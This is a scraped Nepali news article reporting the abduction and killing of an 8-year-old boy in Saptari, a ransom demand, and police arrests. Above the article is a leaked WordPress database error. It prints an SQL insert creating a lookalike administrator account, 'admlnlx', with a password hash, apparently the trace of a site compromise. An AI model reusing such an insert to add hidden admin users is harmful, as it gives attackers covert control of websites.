WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$ByMugjJw71fOiwWiNN88o4ReqbChvz/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-09 06:21:27', '', 'admlnlx', 'admlnlx')
सप्तरी,मंसिर ३०–
लामो समययता अपहरण र हत्याका घटना कम भएको सप्तरीमा एक ८ वर्षीय बालकको अपहरणपछि हत्या भएको छ ।
गत मंसिर ११ गतेदेखि अपहरणमा परेका जिल्लाको पश्चिमी गाविस हरिपुर–३ का ८ वर्षीय दुर्गानन्द साहको हत्या भएको प्रहरीस्रोतले जानकारी दिएको छ । सो अपहरण र हत्याका घटनामा संलग्न भएको आरोपमा प्रहरीले केही व्यक्तीलाई नियन्त्रणमा लिएको छ ।
सप्तरी प्रहरीले बिहिबार ३ बजे पत्रकार सम्मेलन मार्फत घटना र पक्राउ परेकाहरुलाई सार्वजनिक गर्दैछ । स्रोतका अनुसार उक्त अपहरणका घटनामा पाँचलाख रुपैयाँ फिरौती मागिएको थियो ।